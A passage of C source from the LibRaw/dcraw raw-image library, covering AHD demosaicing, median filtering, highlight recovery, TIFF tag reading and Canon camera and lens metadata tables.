for (top=3; top < height-19; top += TS-16)
for (left=3; left < width-19; left += TS-16) {
mrow = MIN (top+TS, height-3);
mcol = MIN (left+TS, width-3);
for (row=top; row < mrow; row++)
for (col=left; col < mcol; col++)
memcpy (rgb[0][row-top][col-left], image[row*width+col], 6);
FORC3 memcpy (rgb[c+1], rgb[0], sizeof *rgb);
/* Interpolate green horizontally, vertically, and along both diagonals: */
for (row=top; row < mrow; row++)
for (col=left; col < mcol; col++) {
if ((f = fcol(row,col)) == 1) continue;
pix = image + row*width + col;
hex = allhex[row % 3][col % 3][0];
color[1][0] = 174 * (pix[ hex[1]][1] + pix[ hex[0]][1]) -
46 * (pix[2*hex[1]][1] + pix[2*hex[0]][1]);
color[1][1] = 223 * pix[ hex[3]][1] + pix[ hex[2]][1] * 33 +
92 * (pix[ 0 ][f] - pix[ -hex[2]][f]);
FORC(2) color[1][2+c] =
164 * pix[hex[4+c]][1] + 92 * pix[-2*hex[4+c]][1] + 33 *
(2*pix[0][f] - pix[3*hex[4+c]][f] - pix[-3*hex[4+c]][f]);
FORC4 rgb[c^!((row-sgrow) % 3)][row-top][col-left][1] =
LIM(color[1][c] >> 8,pix[0][1],pix[0][3]);
}
for (pass=0; pass < passes; pass++) {
if (pass == 1)
memcpy (rgb+=4, buffer, 4*sizeof *rgb);
/* Recalculate green from interpolated values of closer pixels: */
if (pass) {
for (row=top+2; row < mrow-2; row++)
for (col=left+2; col < mcol-2; col++) {
if ((f = fcol(row,col)) == 1) continue;
pix = image + row*width + col;
hex = allhex[row % 3][col % 3][1];
for (d=3; d < 6; d++) {
rix = &rgb[(d-2)^!((row-sgrow) % 3)][row-top][col-left];
val = rix[-2*hex[d]][1] + 2*rix[hex[d]][1]
- rix[-2*hex[d]][f] - 2*rix[hex[d]][f] + 3*rix[0][f];
rix[0][1] = LIM(val/3,pix[0][1],pix[0][3]);
}
}
}
/* Interpolate red and blue values for solitary green pixels: */
for (row=(top-sgrow+4)/3*3+sgrow; row < mrow-2; row+=3)
for (col=(left-sgcol+4)/3*3+sgcol; col < mcol-2; col+=3) {
rix = &rgb[0][row-top][col-left];
h = fcol(row,col+1);
memset (diff, 0, sizeof diff);
for (i=1, d=0; d < 6; d++, i^=TS^1, h^=2) {
for (c=0; c < 2; c++, h^=2) {
g = 2*rix[0][1] - rix[i<<c][1] - rix[-i<<c][1];
color[h][d] = g + rix[i<<c][h] + rix[-i<<c][h];
if (d > 1)
diff[d] += SQR (rix[i<<c][1] - rix[-i<<c][1]
- rix[i<<c][h] + rix[-i<<c][h]) + SQR(g);
}
if (d > 1 && (d & 1))
if (diff[d-1] < diff[d])
FORC(2) color[c*2][d] = color[c*2][d-1];
if (d < 2 || (d & 1)) {
FORC(2) rix[0][c*2] = CLIP(color[c*2][d]/2);
rix += TS*TS;
}
}
}
/* Interpolate red for blue pixels and vice versa: */
for (row=top+3; row < mrow-3; row++)
for (col=left+3; col < mcol-3; col++) {
if ((f = 2-fcol(row,col)) == 1) continue;
rix = &rgb[0][row-top][col-left];
c = (row-sgrow) % 3 ? TS:1;
h = 3 * (c ^ TS ^ 1);
for (d=0; d < 4; d++, rix += TS*TS) {
i = d > 1 || ((d ^ c) & 1) ||
((ABS(rix[0][1]-rix[c][1])+ABS(rix[0][1]-rix[-c][1])) <
2*(ABS(rix[0][1]-rix[h][1])+ABS(rix[0][1]-rix[-h][1]))) ? c:h;
rix[0][f] = CLIP((rix[i][f] + rix[-i][f] +
2*rix[0][1] - rix[i][1] - rix[-i][1])/2);
}
}
/* Fill in red and blue for 2x2 blocks of green: */
for (row=top+2; row < mrow-2; row++) if ((row-sgrow) % 3)
for (col=left+2; col < mcol-2; col++) if ((col-sgcol) % 3) {
rix = &rgb[0][row-top][col-left];
hex = allhex[row % 3][col % 3][1];
for (d=0; d < ndir; d+=2, rix += TS*TS)
if (hex[d] + hex[d+1]) {
g = 3*rix[0][1] - 2*rix[hex[d]][1] - rix[hex[d+1]][1];
for (c=0; c < 4; c+=2) rix[0][c] =
CLIP((g + 2*rix[hex[d]][c] + rix[hex[d+1]][c])/3);
} else {
g = 2*rix[0][1] - rix[hex[d]][1] - rix[hex[d+1]][1];
for (c=0; c < 4; c+=2) rix[0][c] =
CLIP((g + rix[hex[d]][c] + rix[hex[d+1]][c])/2);
}
}
}
rgb = (ushort(*)[TS][TS][3]) buffer;
mrow -= top;
mcol -= left;
/* Convert to CIELab and differentiate in all directions: */
for (d=0; d < ndir; d++) {
for (row=2; row < mrow-2; row++)
for (col=2; col < mcol-2; col++)
cielab (rgb[d][row][col], lab[row][col]);
for (f=dir[d & 3],row=3; row < mrow-3; row++)
for (col=3; col < mcol-3; col++) {
lix = &lab[row][col];
g = 2*lix[0][0] - lix[f][0] - lix[-f][0];
drv[d][row][col] = SQR(g)
+ SQR((2*lix[0][1] - lix[f][1] - lix[-f][1] + g*500/232))
+ SQR((2*lix[0][2] - lix[f][2] - lix[-f][2] - g*500/580));
}
}
/* Build homogeneity maps from the derivatives: */
memset(homo, 0, ndir*TS*TS);
for (row=4; row < mrow-4; row++)
for (col=4; col < mcol-4; col++) {
for (tr=FLT_MAX, d=0; d < ndir; d++)
if (tr > drv[d][row][col])
tr = drv[d][row][col];
tr *= 8;
for (d=0; d < ndir; d++)
for (v=-1; v <= 1; v++)
for (h=-1; h <= 1; h++)
if (drv[d][row+v][col+h] <= tr)
homo[d][row][col]++;
}
/* Average the most homogenous pixels for the final result: */
if (height-top < TS+4) mrow = height-top+2;
if (width-left < TS+4) mcol = width-left+2;
for (row = MIN(top,8); row < mrow-8; row++)
for (col = MIN(left,8); col < mcol-8; col++) {
for (d=0; d < ndir; d++)
for (hm[d]=0, v=-2; v <= 2; v++)
for (h=-2; h <= 2; h++)
hm[d] += homo[d][row+v][col+h];
for (d=0; d < ndir-4; d++)
if (hm[d] < hm[d+4]) hm[d ] = 0; else
if (hm[d] > hm[d+4]) hm[d+4] = 0;
for (max=hm[0],d=1; d < ndir; d++)
if (max < hm[d]) max = hm[d];
max -= max >> 3;
memset (avg, 0, sizeof avg);
for (d=0; d < ndir; d++)
if (hm[d] >= max) {
FORC3 avg[c] += rgb[d][row][col][c];
avg[3]++;
}
FORC3 image[(row+top)*width+col+left][c] = avg[c]/avg[3];
}
}
free(buffer);
border_interpolate(8);
}
#undef fcol
/*
Adaptive Homogeneity-Directed interpolation is based on
the work of Keigo Hirakawa, Thomas Parks, and Paul Lee.
*/
#ifdef LIBRAW_LIBRARY_BUILD
void CLASS ahd_interpolate_green_h_and_v(int top, int left, ushort (*out_rgb)[TS][TS][3])
{
int row, col;
int c, val;
ushort (*pix)[4];
const int rowlimit = MIN(top+TS, height-2);
const int collimit = MIN(left+TS, width-2);
for (row = top; row < rowlimit; row++) {
col = left + (FC(row,left) & 1);
for (c = FC(row,col); col < collimit; col+=2) {
pix = image + row*width+col;
val = ((pix[-1][1] + pix[0][c] + pix[1][1]) * 2
- pix[-2][c] - pix[2][c]) >> 2;
out_rgb[0][row-top][col-left][1] = ULIM(val,pix[-1][1],pix[1][1]);
val = ((pix[-width][1] + pix[0][c] + pix[width][1]) * 2
- pix[-2*width][c] - pix[2*width][c]) >> 2;
out_rgb[1][row-top][col-left][1] = ULIM(val,pix[-width][1],pix[width][1]);
}
}
}
void CLASS ahd_interpolate_r_and_b_in_rgb_and_convert_to_cielab(int top, int left, ushort (*inout_rgb)[TS][3], short (*out_lab)[TS][3])
{
unsigned row, col;
int c, val;
ushort (*pix)[4];
ushort (*rix)[3];
short (*lix)[3];
float xyz[3];
const unsigned num_pix_per_row = 4*width;
const unsigned rowlimit = MIN(top+TS-1, height-3);
const unsigned collimit = MIN(left+TS-1, width-3);
ushort *pix_above;
ushort *pix_below;
int t1, t2;
for (row = top+1; row < rowlimit; row++) {
pix = image + row*width + left;
rix = &inout_rgb[row-top][0];
lix = &out_lab[row-top][0];
for (col = left+1; col < collimit; col++) {
pix++;
pix_above = &pix[0][0] - num_pix_per_row;
pix_below = &pix[0][0] + num_pix_per_row;
rix++;
lix++;
c = 2 - FC(row, col);
if (c == 1) {
c = FC(row+1,col);
t1 = 2-c;
val = pix[0][1] + (( pix[-1][t1] + pix[1][t1]
- rix[-1][1] - rix[1][1] ) >> 1);
rix[0][t1] = CLIP(val);
val = pix[0][1] + (( pix_above[c] + pix_below[c]
- rix[-TS][1] - rix[TS][1] ) >> 1);
} else {
t1 = -4+c; /* -4+c: pixel of color c to the left */
t2 = 4+c; /* 4+c: pixel of color c to the right */
val = rix[0][1] + (( pix_above[t1] + pix_above[t2]
+ pix_below[t1] + pix_below[t2]
- rix[-TS-1][1] - rix[-TS+1][1]
- rix[+TS-1][1] - rix[+TS+1][1] + 1) >> 2);
}
rix[0][c] = CLIP(val);
c = FC(row,col);
rix[0][c] = pix[0][c];
cielab(rix[0],lix[0]);
}
}
}
void CLASS ahd_interpolate_r_and_b_and_convert_to_cielab(int top, int left, ushort (*inout_rgb)[TS][TS][3], short (*out_lab)[TS][TS][3])
{
int direction;
for (direction = 0; direction < 2; direction++) {
ahd_interpolate_r_and_b_in_rgb_and_convert_to_cielab(top, left, inout_rgb[direction], out_lab[direction]);
}
}
void CLASS ahd_interpolate_build_homogeneity_map(int top, int left, short (*lab)[TS][TS][3], char (*out_homogeneity_map)[TS][2])
{
int row, col;
int tr, tc;
int direction;
int i;
short (*lix)[3];
short (*lixs[2])[3];
short *adjacent_lix;
unsigned ldiff[2][4], abdiff[2][4], leps, abeps;
static const int dir[4] = { -1, 1, -TS, TS };
const int rowlimit = MIN(top+TS-2, height-4);
const int collimit = MIN(left+TS-2, width-4);
int homogeneity;
char (*homogeneity_map_p)[2];
memset (out_homogeneity_map, 0, 2*TS*TS);
for (row=top+2; row < rowlimit; row++) {
tr = row-top;
homogeneity_map_p = &out_homogeneity_map[tr][1];
for (direction=0; direction < 2; direction++) {
lixs[direction] = &lab[direction][tr][1];
}
for (col=left+2; col < collimit; col++) {
tc = col-left;
homogeneity_map_p++;
for (direction=0; direction < 2; direction++) {
lix = ++lixs[direction];
for (i=0; i < 4; i++) {
adjacent_lix = lix[dir[i]];
ldiff[direction][i] = ABS(lix[0][0]-adjacent_lix[0]);
abdiff[direction][i] = SQR(lix[0][1]-adjacent_lix[1])
+ SQR(lix[0][2]-adjacent_lix[2]);
}
}
leps = MIN(MAX(ldiff[0][0],ldiff[0][1]),
MAX(ldiff[1][2],ldiff[1][3]));
abeps = MIN(MAX(abdiff[0][0],abdiff[0][1]),
MAX(abdiff[1][2],abdiff[1][3]));
for (direction=0; direction < 2; direction++) {
homogeneity = 0;
for (i=0; i < 4; i++) {
if (ldiff[direction][i] <= leps && abdiff[direction][i] <= abeps) {
homogeneity++;
}
}
homogeneity_map_p[0][direction] = homogeneity;
}
}
}
}
void CLASS ahd_interpolate_combine_homogeneous_pixels(int top, int left, ushort (*rgb)[TS][TS][3], char (*homogeneity_map)[TS][2])
{
int row, col;
int tr, tc;
int i, j;
int direction;
int hm[2];
int c;
const int rowlimit = MIN(top+TS-3, height-5);
const int collimit = MIN(left+TS-3, width-5);
ushort (*pix)[4];
ushort (*rix[2])[3];
for (row=top+3; row < rowlimit; row++) {
tr = row-top;
pix = &image[row*width+left+2];
for (direction = 0; direction < 2; direction++) {
rix[direction] = &rgb[direction][tr][2];
}
for (col=left+3; col < collimit; col++) {
tc = col-left;
pix++;
for (direction = 0; direction < 2; direction++) {
rix[direction]++;
}
for (direction=0; direction < 2; direction++) {
hm[direction] = 0;
for (i=tr-1; i <= tr+1; i++) {
for (j=tc-1; j <= tc+1; j++) {
hm[direction] += homogeneity_map[i][j][direction];
}
}
}
if (hm[0] != hm[1]) {
memcpy(pix[0], rix[hm[1] > hm[0]][0], 3 * sizeof(ushort));
} else {
FORC3 {
pix[0][c] = (rix[0][0][c] + rix[1][0][c]) >> 1;
}
}
}
}
}
void CLASS ahd_interpolate()
{
int i, j, k, top, left;
float xyz_cam[3][4],r;
char *buffer;
ushort (*rgb)[TS][TS][3];
short (*lab)[TS][TS][3];
char (*homo)[TS][2];
int terminate_flag = 0;
cielab(0,0);
border_interpolate(5);
#ifdef LIBRAW_LIBRARY_BUILD
#ifdef LIBRAW_USE_OPENMP
#pragma omp parallel private(buffer,rgb,lab,homo,top,left,i,j,k) shared(xyz_cam,terminate_flag)
#endif
#endif
{
buffer = (char *) malloc (26*TS*TS); /* 1664 kB */
merror (buffer, "ahd_interpolate()");
rgb = (ushort(*)[TS][TS][3]) buffer;
lab = (short (*)[TS][TS][3])(buffer + 12*TS*TS);
homo = (char (*)[TS][2]) (buffer + 24*TS*TS);
#ifdef LIBRAW_LIBRARY_BUILD
#ifdef LIBRAW_USE_OPENMP
#pragma omp for schedule(dynamic)
#endif
#endif
for (top=2; top < height-5; top += TS-6){
#ifdef LIBRAW_LIBRARY_BUILD
#ifdef LIBRAW_USE_OPENMP
if(0== omp_get_thread_num())
#endif
if(callbacks.progress_cb) {
int rr = (*callbacks.progress_cb)(callbacks.progresscb_data,LIBRAW_PROGRESS_INTERPOLATE,top-2,height-7);
if(rr)
terminate_flag = 1;
}
#endif
for (left=2; !terminate_flag && (left < width-5); left += TS-6) {
ahd_interpolate_green_h_and_v(top, left, rgb);
ahd_interpolate_r_and_b_and_convert_to_cielab(top, left, rgb, lab);
ahd_interpolate_build_homogeneity_map(top, left, lab, homo);
ahd_interpolate_combine_homogeneous_pixels(top, left, rgb, homo);
}
}
free (buffer);
}
#ifdef LIBRAW_LIBRARY_BUILD
if(terminate_flag)
throw LIBRAW_EXCEPTION_CANCELLED_BY_CALLBACK;
#endif
}
#else
void CLASS ahd_interpolate()
{
int i, j, top, left, row, col, tr, tc, c, d, val, hm[2];
static const int dir[4] = { -1, 1, -TS, TS };
unsigned ldiff[2][4], abdiff[2][4], leps, abeps;
ushort (*rgb)[TS][TS][3], (*rix)[3], (*pix)[4];
short (*lab)[TS][TS][3], (*lix)[3];
char (*homo)[TS][TS], *buffer;
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("AHD interpolation...\n"));
#endif
cielab (0,0);
border_interpolate(5);
buffer = (char *) malloc (26*TS*TS);
merror (buffer, "ahd_interpolate()");
rgb = (ushort(*)[TS][TS][3]) buffer;
lab = (short (*)[TS][TS][3])(buffer + 12*TS*TS);
homo = (char (*)[TS][TS]) (buffer + 24*TS*TS);
for (top=2; top < height-5; top += TS-6)
for (left=2; left < width-5; left += TS-6) {
/* Interpolate green horizontally and vertically: */
for (row=top; row < top+TS && row < height-2; row++) {
col = left + (FC(row,left) & 1);
for (c = FC(row,col); col < left+TS && col < width-2; col+=2) {
pix = image + row*width+col;
val = ((pix[-1][1] + pix[0][c] + pix[1][1]) * 2
- pix[-2][c] - pix[2][c]) >> 2;
rgb[0][row-top][col-left][1] = ULIM(val,pix[-1][1],pix[1][1]);
val = ((pix[-width][1] + pix[0][c] + pix[width][1]) * 2
- pix[-2*width][c] - pix[2*width][c]) >> 2;
rgb[1][row-top][col-left][1] = ULIM(val,pix[-width][1],pix[width][1]);
}
}
/* Interpolate red and blue, and convert to CIELab: */
for (d=0; d < 2; d++)
for (row=top+1; row < top+TS-1 && row < height-3; row++)
for (col=left+1; col < left+TS-1 && col < width-3; col++) {
pix = image + row*width+col;
rix = &rgb[d][row-top][col-left];
lix = &lab[d][row-top][col-left];
if ((c = 2 - FC(row,col)) == 1) {
c = FC(row+1,col);
val = pix[0][1] + (( pix[-1][2-c] + pix[1][2-c]
- rix[-1][1] - rix[1][1] ) >> 1);
rix[0][2-c] = CLIP(val);
val = pix[0][1] + (( pix[-width][c] + pix[width][c]
- rix[-TS][1] - rix[TS][1] ) >> 1);
} else
val = rix[0][1] + (( pix[-width-1][c] + pix[-width+1][c]
+ pix[+width-1][c] + pix[+width+1][c]
- rix[-TS-1][1] - rix[-TS+1][1]
- rix[+TS-1][1] - rix[+TS+1][1] + 1) >> 2);
rix[0][c] = CLIP(val);
c = FC(row,col);
rix[0][c] = pix[0][c];
cielab (rix[0],lix[0]);
}
/* Build homogeneity maps from the CIELab images: */
memset (homo, 0, 2*TS*TS);
for (row=top+2; row < top+TS-2 && row < height-4; row++) {
tr = row-top;
for (col=left+2; col < left+TS-2 && col < width-4; col++) {
tc = col-left;
for (d=0; d < 2; d++) {
lix = &lab[d][tr][tc];
for (i=0; i < 4; i++) {
ldiff[d][i] = ABS(lix[0][0]-lix[dir[i]][0]);
abdiff[d][i] = SQR(lix[0][1]-lix[dir[i]][1])
+ SQR(lix[0][2]-lix[dir[i]][2]);
}
}
leps = MIN(MAX(ldiff[0][0],ldiff[0][1]),
MAX(ldiff[1][2],ldiff[1][3]));
abeps = MIN(MAX(abdiff[0][0],abdiff[0][1]),
MAX(abdiff[1][2],abdiff[1][3]));
for (d=0; d < 2; d++)
for (i=0; i < 4; i++)
if (ldiff[d][i] <= leps && abdiff[d][i] <= abeps)
homo[d][tr][tc]++;
}
}
/* Combine the most homogenous pixels for the final result: */
for (row=top+3; row < top+TS-3 && row < height-5; row++) {
tr = row-top;
for (col=left+3; col < left+TS-3 && col < width-5; col++) {
tc = col-left;
for (d=0; d < 2; d++)
for (hm[d]=0, i=tr-1; i <= tr+1; i++)
for (j=tc-1; j <= tc+1; j++)
hm[d] += homo[d][i][j];
if (hm[0] != hm[1])
FORC3 image[row*width+col][c] = rgb[hm[1] > hm[0]][tr][tc][c];
else
FORC3 image[row*width+col][c] =
(rgb[0][tr][tc][c] + rgb[1][tr][tc][c]) >> 1;
}
}
}
free (buffer);
}
#endif
#undef TS
void CLASS median_filter()
{
ushort (*pix)[4];
int pass, c, i, j, k, med[9];
static const uchar opt[] = /* Optimal 9-element median search */
{ 1,2, 4,5, 7,8, 0,1, 3,4, 6,7, 1,2, 4,5, 7,8,
0,3, 5,8, 4,7, 3,6, 1,4, 2,5, 4,7, 4,2, 6,4, 4,2 };
for (pass=1; pass <= med_passes; pass++) {
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_MEDIAN_FILTER,pass-1,med_passes);
#endif
#ifdef DCRAW_VERBOSE
if (verbose)
fprintf (stderr,_("Median filter pass %d...\n"), pass);
#endif
for (c=0; c < 3; c+=2) {
for (pix = image; pix < image+width*height; pix++)
pix[0][3] = pix[0][c];
for (pix = image+width; pix < image+width*(height-1); pix++) {
if ((pix-image+1) % width < 2) continue;
for (k=0, i = -width; i <= width; i += width)
for (j = i-1; j <= i+1; j++)
med[k++] = pix[j][3] - pix[j][1];
for (i=0; i < sizeof opt; i+=2)
if (med[opt[i]] > med[opt[i+1]])
SWAP (med[opt[i]] , med[opt[i+1]]);
pix[0][c] = CLIP(med[4] + pix[0][1]);
}
}
}
}
void CLASS blend_highlights()
{
int clip=INT_MAX, row, col, c, i, j;
static const float trans[2][4][4] =
{ { { 1,1,1 }, { 1.7320508,-1.7320508,0 }, { -1,-1,2 } },
{ { 1,1,1,1 }, { 1,-1,1,-1 }, { 1,1,-1,-1 }, { 1,-1,-1,1 } } };
static const float itrans[2][4][4] =
{ { { 1,0.8660254,-0.5 }, { 1,-0.8660254,-0.5 }, { 1,0,1 } },
{ { 1,1,1,1 }, { 1,-1,1,-1 }, { 1,1,-1,-1 }, { 1,-1,-1,1 } } };
float cam[2][4], lab[2][4], sum[2], chratio;
if ((unsigned) (colors-3) > 1) return;
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("Blending highlights...\n"));
#endif
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_HIGHLIGHTS,0,2);
#endif
FORCC if (clip > (i = 65535*pre_mul[c])) clip = i;
for (row=0; row < height; row++)
for (col=0; col < width; col++) {
FORCC if (image[row*width+col][c] > clip) break;
if (c == colors) continue;
FORCC {
cam[0][c] = image[row*width+col][c];
cam[1][c] = MIN(cam[0][c],clip);
}
for (i=0; i < 2; i++) {
FORCC for (lab[i][c]=j=0; j < colors; j++)
lab[i][c] += trans[colors-3][c][j] * cam[i][j];
for (sum[i]=0,c=1; c < colors; c++)
sum[i] += SQR(lab[i][c]);
}
chratio = sqrt(sum[1]/sum[0]);
for (c=1; c < colors; c++)
lab[0][c] *= chratio;
FORCC for (cam[0][c]=j=0; j < colors; j++)
cam[0][c] += itrans[colors-3][c][j] * lab[0][j];
FORCC image[row*width+col][c] = cam[0][c] / colors;
}
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_HIGHLIGHTS,1,2);
#endif
}
#define SCALE (4 >> shrink)
void CLASS recover_highlights()
{
float *map, sum, wgt, grow;
int hsat[4], count, spread, change, val, i;
unsigned high, wide, mrow, mcol, row, col, kc, c, d, y, x;
ushort *pixel;
static const signed char dir[8][2] =
{ {-1,-1}, {-1,0}, {-1,1}, {0,1}, {1,1}, {1,0}, {1,-1}, {0,-1} };
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("Rebuilding highlights...\n"));
#endif
grow = pow (2.0, 4-highlight);
FORCC hsat[c] = 32000 * pre_mul[c];
for (kc=0, c=1; c < colors; c++)
if (pre_mul[kc] < pre_mul[c]) kc = c;
high = height / SCALE;
wide = width / SCALE;
map = (float *) calloc (high, wide*sizeof *map);
merror (map, "recover_highlights()");
FORCC if (c != kc) {
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_HIGHLIGHTS,c-1,colors-1);
#endif
memset (map, 0, high*wide*sizeof *map);
for (mrow=0; mrow < high; mrow++)
for (mcol=0; mcol < wide; mcol++) {
sum = wgt = count = 0;
for (row = mrow*SCALE; row < (mrow+1)*SCALE; row++)
for (col = mcol*SCALE; col < (mcol+1)*SCALE; col++) {
pixel = image[row*width+col];
if (pixel[c] / hsat[c] == 1 && pixel[kc] > 24000) {
sum += pixel[c];
wgt += pixel[kc];
count++;
}
}
if (count == SCALE*SCALE)
map[mrow*wide+mcol] = sum / wgt;
}
for (spread = 32/grow; spread--; ) {
for (mrow=0; mrow < high; mrow++)
for (mcol=0; mcol < wide; mcol++) {
if (map[mrow*wide+mcol]) continue;
sum = count = 0;
for (d=0; d < 8; d++) {
y = mrow + dir[d][0];
x = mcol + dir[d][1];
if (y < high && x < wide && map[y*wide+x] > 0) {
sum += (1 + (d & 1)) * map[y*wide+x];
count += 1 + (d & 1);
}
}
if (count > 3)
map[mrow*wide+mcol] = - (sum+grow) / (count+grow);
}
for (change=i=0; i < high*wide; i++)
if (map[i] < 0) {
map[i] = -map[i];
change = 1;
}
if (!change) break;
}
for (i=0; i < high*wide; i++)
if (map[i] == 0) map[i] = 1;
for (mrow=0; mrow < high; mrow++)
for (mcol=0; mcol < wide; mcol++) {
for (row = mrow*SCALE; row < (mrow+1)*SCALE; row++)
for (col = mcol*SCALE; col < (mcol+1)*SCALE; col++) {
pixel = image[row*width+col];
if (pixel[c] / hsat[c] > 1) {
val = pixel[kc] * map[mrow*wide+mcol];
if (pixel[c] < val) pixel[c] = CLIP(val);
}
}
}
}
free (map);
}
#undef SCALE
void CLASS tiff_get (unsigned base,
unsigned *tag, unsigned *type, unsigned *len, unsigned *save)
{
*tag = get2();
*type = get2();
*len = get4();
*save = ftell(ifp) + 4;
if (*len * ("11124811248484"[*type < 14 ? *type:0]-'0') > 4)
fseek (ifp, get4()+base, SEEK_SET);
}
void CLASS parse_thumb_note (int base, unsigned toff, unsigned tlen)
{
unsigned entries, tag, type, len, save;
entries = get2();
while (entries--) {
tiff_get (base, &tag, &type, &len, &save);
if (tag == toff) thumb_offset = get4()+base;
if (tag == tlen) thumb_length = get4();
fseek (ifp, save, SEEK_SET);
}
}
//@end COMMON
int CLASS parse_tiff_ifd (int base);
//@out COMMON
static float powf_lim(float a, float b, float limup)
{
return (b>limup || b < -limup)?0.f:powf(a,b);
}
static float libraw_powf64(float a, float b)
{
return powf_lim(a,b,64.f);
}
#ifdef LIBRAW_LIBRARY_BUILD
static float my_roundf(float x) {
float t;
if (x >= 0.0) {
t = ceilf(x);
if (t - x > 0.5) t -= 1.0;
return t;
} else {
t = ceilf(-x);
if (t + x > 0.5) t -= 1.0;
return -t;
}
}
static float _CanonConvertAperture(ushort in)
{
if ((in == (ushort)0xffe0) || (in == (ushort)0x7fff)) return 0.0f;
return libraw_powf64(2.0, in/64.0);
}
static float _CanonConvertEV (short in)
{
short EV, Sign, Frac;
float Frac_f;
EV = in;
if (EV < 0) {
EV = -EV;
Sign = -1;
} else {
Sign = 1;
}
Frac = EV & 0x1f;
EV -= Frac; // remove fraction
if (Frac == 0x0c) { // convert 1/3 and 2/3 codes
Frac_f = 32.0f / 3.0f;
} else if (Frac == 0x14) {
Frac_f = 64.0f / 3.0f;
} else Frac_f = (float) Frac;
return ((float)Sign * ((float)EV + Frac_f))/32.0f;
}
void CLASS setCanonBodyFeatures (unsigned id)
{
imgdata.lens.makernotes.CamID = id;
if (
(id == 0x80000001) || // 1D
(id == 0x80000174) || // 1D2
(id == 0x80000232) || // 1D2N
(id == 0x80000169) || // 1D3
(id == 0x80000281) // 1D4
)
{
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_APSH;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Canon_EF;
}
else
if (
(id == 0x80000167) || // 1Ds
(id == 0x80000188) || // 1Ds2
(id == 0x80000215) || // 1Ds3
(id == 0x80000269) || // 1DX
(id == 0x80000328) || // 1DX2
(id == 0x80000324) || // 1DC
(id == 0x80000213) || // 5D
(id == 0x80000218) || // 5D2
(id == 0x80000285) || // 5D3
(id == 0x80000349) || // 5D4
(id == 0x80000382) || // 5DS
(id == 0x80000401) || // 5DS R
(id == 0x80000302) // 6D
)
{
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_FF;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Canon_EF;
}
else
if (
(id == 0x80000331) || // M
(id == 0x80000355) || // M2
(id == 0x80000374) || // M3
(id == 0x80000384) || // M10
(id == 0x80000394) // M5
)
{
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_APSC;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Canon_EF_M;
}
else
if (
(id == 0x01140000) || // D30
(id == 0x01668000) || // D60
(id > 0x80000000)
)
{
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_APSC;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Canon_EF;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Unknown;
}
else
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
}
return;
}
void CLASS processCanonCameraInfo (unsigned id, uchar *CameraInfo, unsigned maxlen)
{
ushort iCanonLensID = 0, iCanonMaxFocal = 0, iCanonMinFocal = 0, iCanonLens = 0, iCanonCurFocal = 0, iCanonFocalType = 0;
if(maxlen<16) return; // too short, so broken
CameraInfo[0] = 0;
CameraInfo[1] = 0;
switch (id) {
case 0x80000001: // 1D
case 0x80000167: // 1DS
iCanonCurFocal = 10;
iCanonLensID = 13;
iCanonMinFocal = 14;
iCanonMaxFocal = 16;
if (!imgdata.lens.makernotes.CurFocal)
imgdata.lens.makernotes.CurFocal = sget2(CameraInfo + iCanonCurFocal);
if (!imgdata.lens.makernotes.MinFocal)
imgdata.lens.makernotes.MinFocal = sget2(CameraInfo + iCanonMinFocal);
if (!imgdata.lens.makernotes.MaxFocal)
imgdata.lens.makernotes.MaxFocal = sget2(CameraInfo + iCanonMaxFocal);
break;
case 0x80000174: // 1DMkII
case 0x80000188: // 1DsMkII
iCanonCurFocal = 9;
iCanonLensID = 12;
iCanonMinFocal = 17;
iCanonMaxFocal = 19;
iCanonFocalType = 45;
break;
case 0x80000232: // 1DMkII N
iCanonCurFocal = 9;
iCanonLensID = 12;
iCanonMinFocal = 17;
iCanonMaxFocal = 19;
break;
case 0x80000169: // 1DMkIII
case 0x80000215: // 1DsMkIII
iCanonCurFocal = 29;
iCanonLensID = 273;
iCanonMinFocal = 275;
iCanonMaxFocal = 277;
break;
case 0x80000281: // 1DMkIV
iCanonCurFocal = 30;
iCanonLensID = 335;
iCanonMinFocal = 337;
iCanonMaxFocal = 339;
break;
case 0x80000269: // 1D X
iCanonCurFocal = 35;
iCanonLensID = 423;
iCanonMinFocal = 425;
iCanonMaxFocal = 427;
break;
case 0x80000213: // 5D
iCanonCurFocal = 40;
if (!sget2Rev(CameraInfo + 12)) iCanonLensID = 151;
else iCanonLensID = 12;
iCanonMinFocal = 147;
iCanonMaxFocal = 149;
break;
case 0x80000218: // 5DMkII
iCanonCurFocal = 30;
iCanonLensID = 230;
iCanonMinFocal = 232;
iCanonMaxFocal = 234;
break;
case 0x80000285: // 5DMkIII
iCanonCurFocal = 35;
iCanonLensID = 339;
iCanonMinFocal = 341;
iCanonMaxFocal = 343;
break;
case 0x80000302: // 6D
iCanonCurFocal = 35;
iCanonLensID = 353;
iCanonMinFocal = 355;
iCanonMaxFocal = 357;
break;
case 0x80000250: // 7D
iCanonCurFocal = 30;
iCanonLensID = 274;
iCanonMinFocal = 276;
iCanonMaxFocal = 278;
break;
case 0x80000190: // 40D
iCanonCurFocal = 29;
iCanonLensID = 214;
iCanonMinFocal = 216;
iCanonMaxFocal = 218;
iCanonLens = 2347;
break;
case 0x80000261: // 50D
iCanonCurFocal = 30;
iCanonLensID = 234;
iCanonMinFocal = 236;
iCanonMaxFocal = 238;
break;
case 0x80000287: // 60D
iCanonCurFocal = 30;
iCanonLensID = 232;
iCanonMinFocal = 234;
iCanonMaxFocal = 236;
break;
case 0x80000325: // 70D
iCanonCurFocal = 35;
iCanonLensID = 358;
iCanonMinFocal = 360;
